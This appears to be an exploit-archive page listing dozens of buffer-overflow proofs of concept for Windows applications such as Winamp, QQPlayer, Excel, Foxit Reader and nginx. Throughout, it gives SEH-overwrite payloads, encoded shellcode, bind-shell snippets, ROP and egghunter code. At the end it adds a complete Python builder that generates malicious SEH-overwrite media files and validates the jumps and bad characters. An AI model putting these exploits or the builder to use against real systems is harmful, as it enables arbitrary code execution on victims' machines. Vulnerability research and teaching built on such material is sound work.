SyncBack-Freeware-3.2.20.0
Software : SyncBack Freeware V3.2.20.0 Author : Lincoln Date : May 19, 2010 Reference : http://www.corelan.be:8800/advisories.php?id=CORELAN-10-041 OS : Windows puts "+ Exploit for SyncBack Freeware V3.2.20.0" Zip Headers header1= "\x50\x4B\x03\x04\x14\x00\x00\x00" +...
BaoFeng-Storm-M3U
Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit CNVD-ID: CNVD-2010-00752 Author: Lufeng Li and Qingshan Li of Neusoft Corporation Download: www.baofeng.com Test: Put the m3u file in a root directory, e.g. c:/ or d:/, and open the m3u file. file = "baofeng.m3u" junk = "\x41" * 795 nseh = "\x61\xe8\xe1"...
GSM-SIM-Utility-5.15
Exploit Title : GSM SIM Utility sms file Local SEH BoF Date : June 28, 2010 Author : chap0 www.seek-truth.net Download Link : http://download.cnet.com/GSM-SIM-Utility/3000-185084-10396246.html?tag=mncol Version : 5.15 import time sc ="d9eb9bd97424f431d2b27a31c964" "8b71308b760c8b761c8b46088b7e"...
Winamp-5.572---Local-BoF
Exploit Title: Winamp v5.572 Local BoF Exploit (Win7 ASLR and DEP Bypass) Date: June 26, 2010 Author: Node Software Link: http://download.nullsoft.com/winamp/client/winamp5572fullemusic-7plusen-us.exe Badchars: \x00\xff\x5c\x2f\x0a\x0d\x20 version = "Winamp 5.572" rop = "A" * 540 # Offset rop +=...
FieldNotes-32-5.0
Title: FieldNotes 32 v5.0 SEH 0day Date: 25/06/2010 Author: TecR0c - http://tecninja.net/blog aka Rocco Calvi Found by: TecR0c - http://twitter.com/TecR0c Advisory: http://www.corelan.be:8866/advisories.php?id=CORELAN-10-053 msg = TITLE=Corelan TEXT="TecR0c pwned you"...
Orbital-Viewer-1.04-(.ov)
Pro: Orbital Viewer v1.04 .orb/.ov Local Universal Stack Overflow Exploit (SEH) Author: CrazyHacker Download: http://www.orbitals.com/orb/setupov.exe Date: 20-6-2010 $junk = 6060; $header = "OrbitalFileV1.0\n"; $nseh = "\xeb\xf9\xff\xff"; # jmp back 7 bytes $seh = "\x0b\x0b\x27\x00"; # universal pop eb...
Batch-Audio-Converter-Lite-Edition-1.0.0.0
Tested on: Windows XP SP2 Type of Vuln: SEH Code : bacon-exploit.py Greetz: Otoy, Postnix, Jasakom Community, Kilurah, Gesang, and wedus-wedus import struct junk = "A" * 4132 nseh = "\xeb\x06\x90\x90" seh = struct.pack('L', 0x10029bb7) # pop edi pop esi ret from lameenc.dll nop = "\x90" * 30 print "+...
Rosoft-Audio-Converter-4.4.4
Exploit Title: Rosoft Audio Converter 4.4.4 Buffer Overflow Date: June 14, 2010 Author: Blake Software Link: http://www.rosoftengineering.com/freeware/RosoftAudioConverterFree.aspx Version: 4.4.4 calc.exe sc = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"...
Exploit-Easy-RM-to-MP3-2.7.3.700
Exploit Title: Easy RM to MP3 2.7.3.700 Local Buffer Overflow .m3u , .pls , .smi , .wpl , .wax , .wvx , .ram Date: 4 / 8 / 2010 Author: Oh Yaw Theng Software Link: http://www.exploit-db.com/application/10642/ Version: 2.7.3.700 Tested on: Windows XP SP 1 This exploit works for all the file...
Mini-stream-RM-MP3-Converter
Tested on Windows XP SP3 Pro Found By : Cyber-Zone ABDELKHALEK http://www.securityfocus.com/bid/34494 The way this exploit is written is slightly different from the one above. # Vulnerability handler = "ftp://" buff1 = "D" * 17418 eip = "\x7D\xA5\x04\x10" # 0x1004A57D jmp esp C:\Program...
WM-Downloader-3.1.2.2-2010.04.15
Exploit Title: WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH) Date: 2010-07-28 Author: fdisk @fdiskyou e-mail: fdiskyou at deniable.org payload = "\x41" * 43485 payload += "\xeb\x16\x90\x90" # jump payload += "\xb4\x15\xbb\x01" # ppr - WDCodec00.dll payload += "\x90" * 16 # windows/exec - 227 bytes...
QQPlayer-2.3.696.400p1-smi
A different SEH addr might be necessary for XP SP3 ENG. Make sure EAX aligns to the shellcode before decoding. head = ''' ''' payload = head+junk+nseh+seh+adjust+shellcode+junk+foot fobj = open("poc.smi","w") fobj.write(payload) fobj.close()...
QQPlayer-cue-File-Buffer-Overflow
Title: QQPlayer cue File Buffer Overflow Exploit Author: Lufeng Li of Neusoft Corporation Vendor: www.qq.com Platform: Windows XP SP3 Chinese Simplified head = '''FILE "''' junk = "A" * 780 nseh = "\x42\x61\x21\x61" seh = "\xa9\x9e\x41\x00" adjust = "\x32\x42\x61\x33\xca\x83\xc0\x10"...
QQPlayer-asx-File-Processing-Buffer-Overflow
Title: QQPlayer asx File Processing Buffer Overflow Exploit Author: Li Qingshan of Information Security Engineering Center, School of Software and Microelectronics, Peking University Vendor: www.qq.com head = ''' ''' payload = head+junk+nseh+seh+adjust+shellcode+junk+foot fobj = open("poc.asx","w")...
Microsoft-Excel-0x5D-record
This is an exploit for MS10-038/CVE-2010-0822 Everything is hardcoded! winxp sp3 webDEViL import binascii wD="d0cf11e0a1b11ae1000000000000000000000000000000003e000300feff0900060000" wD+="000000000000000000030000000100000000000000001000000200000004000000feff"...
Foxit-Reader-4.0-PDF
Product: Foxit Reader 4.0 Platforms: Windows XP, Windows Vista Web: http://eternal-todo.com import sys,zlib def getFFShellcode(sc): ffsc = '' if len(sc)%4 != 0: sc += (4-len(sc)%4)*'\x00' for i in range(0,len(sc),4): ffsc += '\xff'+sc[i+3]+sc[i+2]+sc[i+1]+sc[i] return ffsc outputHeader = ''' outputFileName =...
Microsoft-Excel-Malformed-FEATHEADER
MS Excel Malformed FEATHEADER Record Exploit CVE-2009-3129, MS09-067, OSVDB-59860 Vulnerable application: MS Office 2003/2007 import sys import zlib # Allwin WinExec cmd.exe + ExitProcess Shellcode - 195 bytes by RubberDuck shellcode = b"\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B"...
A-PDF-WAV-to-MP3-1.0.0
This exploit uses SEH to gain code execution, while EDB 14676 uses a direct EIP overwrite which is operating system specific. code = "\x89\xe1\xd9\xee\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49" "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56"...
Triologic-Media-Player-8-(.m3u)
Exploit Title: Triologic Media Player 8 .m3u Local Universal Unicode Buffer Overflow (SEH) Date: August 17, 2010 Software Link: http://download.cnet.com/Triologic-Media-Player/3000-21394-10691520.html buffer = "\x41" * 536 # buffer buffer += "\x61\x41" # popad + nop/align buffer += "\xF2\x41" # pop,pop,ret...
MUSE-4.9.0.006-(.pls)
Exploit Title: MUSE v4.9.0.006 .pls Local Universal Buffer Overflow (SEH) Date: August 17, 2010 Author: Glafkos Charalambous glafkos@astalavistadotcom payload = "\x41" * 1376 payload += "\xeb\x06\x90\x90" payload += "\xAA\x0c\x02\x10" # 0x10020CAA sdll.dll universal payload += "\x90" * 16 # win32exec -...
MUSE-4.9.0.006-(.m3u)
Exploit Title: MUSE v4.9.0.006 .m3u Local Buffer Overflow Exploit Date: August 17, 2010 Author: Glafkos Charalambous glafkos@astalavistadotcom buffersize = 205 nopsled = "\x90" * 4 # Custom MessageBox, x86/shikata_ga_nai succeeded with size 104 (iteration=1) shellcode =...
Rosoft-media-player-4.4.4
Original Advisory: http://www.exploit-db.com/exploits/14601 - abhishek lyall Download: http://www.exploit-db.com/application/14601/ Platform: Windows XP SP3 EN Professional - VMware outputfile = "exploit.m3u" junk = "\x41" * 3470 nseh = "\xeb\x88\x90\x90" # reverse jump 118 bytes seh = "\x49\xd4\x46\x00" # PPR -...
Xion-Player-1.0.125
Script provided as is without any warranty. Use for educational purposes only. Do not use this code to do anything illegal! Corelan does not want anyone to use this script outputfile = "corelanc0d3r.m3u" offsettonseh = 250 # affected by the m3u path length! junk = "A" * offsettonseh nseh = "\x41\x45"...
Mediacoder-0.7.5.4710-Universal
Mediacoder 0.7.5.4710 Universal SEH Buffer Overflow Exploit Coded By: DrIDE Found By: abhishek lyall Usage: Load the evil .m3u file and click on it. Download: http://www.exploit-db.com/application/14612 code = "\x89\xe6\xda\xdb\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49"...
Mediacoder-0.7.5.4710
MediaCoder 0.7.5.4710 0-day buffer overflow exploit. Vulnerable application link: http://www.mediacoderhq.com/dlfull.htm Tested on XP SP2 filename = "crash.m3u" junk = "\x41" * 256 eip = "\x65\x82\xa5\x7c" # JMP ESP shell32.dll nop = "\x90" * 12 # port bind 5555 shellcode scode =...
Fat-Player-0.6b-WAV
Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute arbitrary code via a long string in a .wav file. NOTE: some of these details are obtained from third party information. print "\nFat Player 0.6b WAV File Processing Buffer Overflow (SEH)" buff1 = "D" * 4132 nseh =...
myMP3-Player-3.0
Exploit Title: myMP3-Player 3.0 (NOT SEH Overwrite) Date: 882010 Author: Oh Yaw Theng Software Link: http://www.chip.de/downloads/myMP3-Player-3.013008621.html filename = "crash.m3u" junk = "\x41" * 1024 ret = "\x65\x82\xA5\x7C" # 7C A5 82 65 FFE4 JMP ESP # Bind shell at TCP Port 5555. Telnet to this port...
nginx-0.6.38-Heap
A quick way to find out just for verification would be to launch nginx, attach GDB to the worker and target it with the exploit, setting the offset to 0, or some other arbitrary value. It should crash on a piece of code which import os import sys import socket import select import struct import...
Microsoft-Excel-OBJ-Record
Title: Microsoft Excel OBJ Record Stack Overflow Version: Excel 2002 and XP SP3 Analysis: http://www.abysssec.com import sys def main(): try: fdR = open('src.xls', 'rb+') strTotal = fdR.read() str1 = strTotal[:36640] str2 = strTotal[37440:] # shellcode calc.exe shellcode =...
Acoustica-Audio-Converter-Pro-1.1
Exploit Title: Acoustica Audio Converter Pro 1.1 build 25 Heap Overflow (.mp3 .wav .ogg .wma) PoC Date: September 21 2010 Author: Carlos Hollmann Software Link: http://www.acoustica.com/audio-converter/download.htm m3u = "crash.m3u" payload =...
A-PDF-All-to-MP3-Converter-1.1.0
Exploit Title: A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit Date: September 18, 2010 Author: modpr0be import struct junk1 = 'A' * 4132 nseh = "\xeb\x06\x90\x90" seh = struct.pack('L', 0x00408B44) # ppr nops2 = "\x90" * 12 # metasploit payload windows/exec cmd=calc | msfencode -e...
DJ-Studio-Pro-8.1.3.2.1
DJ Studio Pro Version 8.1.3.2.1 SEH 0 day Author Abhishek Lyall - abhilyallatgmaildotcom, infoataslitsecuritydotcom Web - http://www.aslitsecurity.com/ filename = "ASL.pls" # windows/exec - CMD=calc.exe shellcode = "\x41\x42\x48\x49\x41\x42\x48\x49" # Egg Hunted...
BACnet-OPC-Client-Buffer-Overflow
After communicating via several emails with the vendor, sharing details about the vulnerability as well as proof-of-concept code (I also offered to send the exploit code for them to test themselves), it was clear that they weren't very interested in fixing the vulnerability. import sys import stru...
Honestech-VHS-to-DVD
Exploit Title: Honestech VHS to DVD 3.0.30 Deluxe Local Buffer Overflow SEH Date: September 16, 2010 Author: Brennon Thomas [email protected] Software Link: n/a Version: 3.0.30.0 Deluxe buf = "\r\n\ \r\n\ \r\n\ \r\n\ MAINDLG\r\n\ PAGE=0\r\n\ \r\n\ AVICODEC\r\n\ VIDEOCODEC=DivX 6.8.5 Codec 2...
Adobe-Acrobat-and-Reader
Title: Adobe Acrobat and Reader "pushstring" Memory Corruption Version: Adobe Reader 9.3.2 Analysis: http://www.abysssec.com import sys class PDF: def __init__(self): self.xrefs = [] self.eol = '\x0a' self.content = '' self.xrefsoffset = 0 def header(self): self.content += '%PDF-1.6' + self.eol def obj(self,...
Excel-RTD-Memory-Corruption
Analysis: http://www.abysssec.com Vendor: http://www.microsoft.com Impact: Critical import sys def main(): try: fdR = open('src.xls', 'rb+') strTotal = fdR.read() str1 = strTotal[:4509] str2 = strTotal[5013:15000] str3 = strTotal[15800:] eip = "\xAd\x57\x00\x30" # pop pop ret jmp = "\xF7\xC2\x03\x30" # call esp...
Audiotran-1.4.2.4-SEH
Audiotran 1.4.2.4 SEH Overflow Exploit 0 day Download the vulnerable application from http://www.e-soft.co.uk/Audiotran.htm Vulnerable version: Audiotran 1.4.2.4 filename = "ASL.pls" # windows/exec - CMD=calc.exe shellcode = b"\xDB\xDF\xD9\x74\x24\xF4\x58\x2B\xC9\xB1\x33\xBA"...
Acoustica-MP3-Audio-Mixer-2.471
The software does not correctly handle an M3U's header and extra info when it is imported into an open sound group. Trigger: launch the app, open an existing sound group (e.g. C:\Program Files\Acoustica MP3 Audio Mixer\example.sgp), then import the crash.m3u and....KaaaaBooom!! magic = "crash.m3u" vuln =...
Microsoft-Office-Visio-DXF
Title: Microsoft Office Visio DXF File Stack based Overflow Version: Microsoft Office Visio 2002 (XP) Analysis: http://www.abysssec.com import sys def main(): try: fdR = open('src.dxf', 'rb+') strTotal = fdR.read() str1 = strTotal[:100] str2 = strTotal[1020:1124] str3 = strTotal[1128:1169] str4 = strTotal[1173:...
Minishare-1.5.5-Buffer-Overflow
Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability users.txt Date: 11/02/2010 Author: Chris Gabriel Software Link: http://sourceforge.net/projects/minishare Version: 1.4.0 - 1.5.5 shellcode = "TYVTX10X41PZ41H4A4H1TA91TAFVTZ32PZNBFZDQE02D" "QF0D13DJE1F4847029R9VNN0D668M194A0I5G5L2G3W3"...
Winamp-5.5.8.2985-(in_mod-plugin)
Pwn And Beans by Mighty-D and 7eK presents: Winamp 5.5.8.2985 in_mod plugin Stack Overflow A Script Kiddie Friendly Production...
Winamp-5.5.8-(in_mod-plugin)
Pwn And Beans by Mighty-D presents: Winamp 5.5.8.2985 in_mod plugin Stack Overflow WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet Bug found by http://www.exploit-db.com/exploits/15248/ POC by fdisk header =...
FatPlayer-0.6b-(.wav)
Exploit Title: FatPlayer 0.6b Malicious WAV Buffer Overflow Vulnerability (SEH) Date: 10/18/10 Author: james AT learnsecurityonline DOT com Software Link: http://sourceforge.net/projects/fatplayer/files/ Version: 0.6 Beta junk = "\x41" * 4132 nSEH = "\x90\x90\xeb\x06" SEH = [0x0046bee3].pack('V') # pop pop...
Quick-Player-1.3-Unicode
Download Vulnerable application from http://download.cnet.com/Quick-Player/3640-21684-10871418.html Vulnerable version Quick Player 1.3 Tested on XP SP2 filename = "ASL.m3u" windows\exec calc.exe unicode uppercase shellcode...
Minishare-1.5.5-BoF
Exploit Title: Minishare 1.5.5 Buffer Overflow Vulnerability users.txt - EggHunter Version Date: 11/19/2010 Author: 0v3r Bug Found By: Chris Gabriel Software Link: http://sourceforge.net/projects/minishare egghunter = "\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"...
MP3-Nator-Buffer-Overflow
Exploit Title: Exploit Buffer Overflow MP3-Nator SEH - DEP BYPASS Date: 18-11-2010 Author: Muhamad Fadzil Ramli Credit/Bug Found By: C4SS!0 G0M3S Software Link: http://files.brothersoft.com/mp3audio/players/mp3nator.zip filename = 'crash.plf' ./msfpayload windows/exec CMD=calc EXITFUNC=seh R |...
DIZzy-1.12-Local
Exploit Title: DIZzy 1.12 Local Stack Overflow Google Dork: n/a Date: 17/11/2010 Author: g30rg3x shellcode = "\xB8\xFF\xEF\xFF\xFF\xF7\xD0\x2B\xE0\x55\x8B\xEC" + "\x33\xFF\x57\x83\xEC\x04\xC6\x45\xF8\x63\xC6\x45" + "\xF9\x6D\xC6\x45\xFA\x64\xC6\x45\xFB\x2E\xC6\x45" +...
Foxit-Reader-4.1.1-EggHunter
Date: 15 Nov 10 Author: dookie at offsec.com App: Foxit Reader 4.1.1 preamble =...
Realtek-HD-Audio-Control-Panel-2.1.3.2
The app has a classic buffer overflow vulnerability; it can be triggered by passing an overly long argument as a startup parameter. Shellcode can be run via a classic ret overwrite or an SEH handler overwrite. filepath = "C:\ShellCode\RTHDCPL 2.1.3.2 - Exploit.bin" f = open(filepath, "wb") f.write('A' * 4...
Realtek-Audio-Microphone-Calibration-1.1.1.6
The app has a classic buffer overflow vulnerability; it can be triggered by passing an overly long argument as a startup parameter. Shellcode can be run via a classic ret overwrite or an SEH handler overwrite. filepath = "C:\ShellCode\MicCal 1.1.1.6 - Exploit.bin" f = open(filepath, "wb") # dummy data f.write('\x90'...
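Nearly every SEH entry in this listing (Batch Audio Converter, WM Downloader, MUSE, A-PDF, FatPlayer, the Realtek entries above) builds the same file layout: filler up to the SEH record, a two-byte short jump in nSEH, a pop/pop/ret address in the handler slot, a nop sled, then shellcode. The Python 3 script below is an added example written for this page; it is not one of the listed PoCs and not any author's code. It generalizes that layout into a builder plus the two checks a practitioner does by hand: that the relative jump actually lands on the sled, and that neither the packed handler address nor the shellcode contains bytes the target parser will mangle. The pop/pop/ret value is the lameenc.dll address the Batch Audio Converter entry reports; the offset, the bad-character set and the INT3 placeholder standing in for shellcode are assumptions made here. The decoder also explains the backward-jump comments in the Orbital Viewer (`\xeb\xf9`, "jmp back 7 bytes" counted from the end of the jmp, so 5 bytes before nSEH) and Rosoft Media Player (`\xeb\x88`, "reverse jump 118 bytes") entries.

```python
import struct

# Constructed sample inputs (added example, not one of the listed PoCs).
# The pop/pop/ret address is the lameenc.dll gadget the Batch Audio Converter
# entry above reports; offset, bad characters and the INT3 placeholder
# "shellcode" are illustrative choices made here.
PPR_LAMEENC = 0x10029BB7
SEH_OFFSET = 4132
BADCHARS = b"\x00\x0a\x0d"
SHELLCODE = b"\xcc" * 32          # INT3 breakpoints stand in for a real payload


def short_jmp(target_offset, insn_offset=0):
    """Encode 'jmp short rel8' so execution resumes at target_offset.

    Offsets are measured from the start of the nSEH field. The CPU adds rel8
    to the address of the byte *after* the 2-byte jmp, so rel8 is
    target - (insn_offset + 2). 'eb 06' at nSEH therefore lands 8 bytes in,
    just past the 4-byte handler pointer.
    """
    rel = target_offset - (insn_offset + 2)
    if not -128 <= rel <= 127:
        raise ValueError("short jump displacement out of range: %d" % rel)
    return b"\xeb" + struct.pack("<b", rel)


def decode_short_jmp(nseh, insn_offset=0):
    """Where a 'jmp short' stored at nSEH lands, relative to the start of nSEH."""
    if nseh[:1] != b"\xeb":
        raise ValueError("nSEH does not start with a short jmp")
    rel = struct.unpack("<b", nseh[1:2])[0]
    return insn_offset + 2 + rel


def pack_addr(addr):
    """SEH record fields are little-endian 32-bit pointers on x86."""
    return struct.pack("<L", addr)


def bad_bytes(blob, badchars=BADCHARS):
    """Sorted list of byte values in blob that the target parser would mangle."""
    return sorted({b for b in blob if b in badchars})


def build_seh_payload(seh_offset, ppr, shellcode, filler=b"A", nops=16,
                      badchars=BADCHARS):
    """Forward-jump layout shared by most entries on this page:

        [filler x seh_offset][nSEH: jmp +6, nop, nop][SEH: pop/pop/ret][nops][shellcode]

    When the overflow triggers a fault, the dispatcher calls the overwritten
    handler; pop/pop/ret returns into nSEH, and the jump there skips over the
    handler pointer into the sled.
    """
    seh = pack_addr(ppr)
    if bad_bytes(seh, badchars):
        # A null as the *last* byte can work when nothing follows it, but then
        # the shellcode must sit before nSEH and the jump must go backwards,
        # which this forward builder does not do; refuse rather than mislead.
        raise ValueError("handler address %r contains bad chars" % seh)
    if bad_bytes(shellcode, badchars):
        raise ValueError("shellcode contains bad chars; re-encode it")
    nseh = short_jmp(8) + b"\x90\x90"
    sled_start = seh_offset + len(nseh) + len(seh)
    # The jump must land exactly on the first sled byte.
    if seh_offset + decode_short_jmp(nseh) != sled_start:
        raise AssertionError("nSEH jump does not reach the nop sled")
    return filler * seh_offset + nseh + seh + b"\x90" * nops + shellcode


if __name__ == "__main__":
    data = build_seh_payload(SEH_OFFSET, PPR_LAMEENC, SHELLCODE)
    with open("crash.m3u", "wb") as f:   # constructed output name
        f.write(data)
    land = decode_short_jmp(data[SEH_OFFSET:SEH_OFFSET + 4])
    print("wrote %d bytes; nSEH jump lands at nSEH+%d" % (len(data), land))
```

The bad-character check is why two entries on this page (Orbital Viewer, Rosoft Media Player) jump backwards: their handler addresses end in `\x00`, which survives only as the final byte written, so everything executable has to sit before the SEH record. Before relying on any "universal" pop/pop/ret, also confirm in a debugger that the module it comes from is loaded at the same base on the target and is not SafeSEH-registered.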